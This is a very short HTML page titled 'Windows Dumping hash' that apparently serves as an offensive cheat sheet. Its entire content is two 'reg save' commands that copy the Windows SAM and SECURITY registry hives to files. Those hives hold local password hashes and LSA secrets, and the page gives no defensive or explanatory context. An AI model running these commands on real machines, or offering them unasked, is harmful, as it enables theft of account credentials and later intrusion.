<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Windows Dumping hash</title>
</head><body><div style="text-align: left"><span style="font-size: 16pt"><span style="font-family: Tahoma">reg save hklm\sam filename1.hiv<br/>
<br/>
reg save hklm\security filename2.hiv<br/>
<br/>
</span></span></div></body></html>